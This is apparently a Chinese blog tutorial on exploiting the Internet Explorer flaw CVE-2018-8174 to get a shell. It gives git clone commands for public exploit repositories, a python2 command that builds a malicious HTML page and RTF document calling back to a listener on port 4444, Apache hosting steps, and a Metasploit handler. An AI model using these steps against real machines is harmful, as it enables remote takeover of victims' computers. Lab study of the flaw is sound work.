利用0DAY漏洞CVE-2018-8174 获取 shell

在此声明文章仅供相互学习参考,严禁利用于违法犯罪,任何事故自行承担!!

一、背景

0DAY 漏洞,最早的破解是专门针对软件的,叫做 WAREZ,后来才发展到游戏,音乐,影视等其他为容的。0day 中的0表示 zero,早期的 0day 表示在软件发行后的24小时内就出现破解版本,现在我们已经引申了这个含义,只要是在软件或者其他东西发布后,在最短时间内出现相关破解的,都可以叫0day。 0day 是一个统称,所有的破解都可以叫 0day。
CVE-2018-8174 漏洞影响最新版本的IE 浏览器及使用了IE 内核的应用程序。用户在浏览网页或打干 Office 文档时都可能中搭,最终被黑客植入后门木马完全控制电脑。微软在 2018年4月20 日早上角认此漏洞,并于2018年5月8号发布了官方安全补丁,对该 0day漏洞进行了修复,并将其命名为CVE-2018-8174.

二、实施步骤

1.安装CVE-2018-8174的exploit模式

git clone https://github.com/iBearcat/CVE-2018-8174_EXP.git(仓库似乎已经被清空无法下载了) 或git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

从github中下载CVE-2018-8174的EXP文件

也可以通过xshell,将下载的CVE-2018-8174的EXP文件上传

2.运行其中的python文件,生成恶意的html文件和恶意文档

python2 CVE-2018-8174.py -u http://192.168.47.165/exploit.html -o hack.rtf -i 192.168.47.165 -p 4444(由于该文件的编写的时间原因,要用python2执行)

-u:URL地址,恶意的html文件的访问地址        -o:生成文档

-i:监听地址        -p:监听端口

3.监听靶机打开恶意html文件和恶意文档

将生成的html文件和恶意文档移动到/var/www/html/目录下,然后开启apache服务器,让目标机通过浏览器打开和下载

打开一个新的终端,开启metasploit的exploit/multi/handler模块进行监听

模块信息如下

再下载hack.rtf,用word文档打开

  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值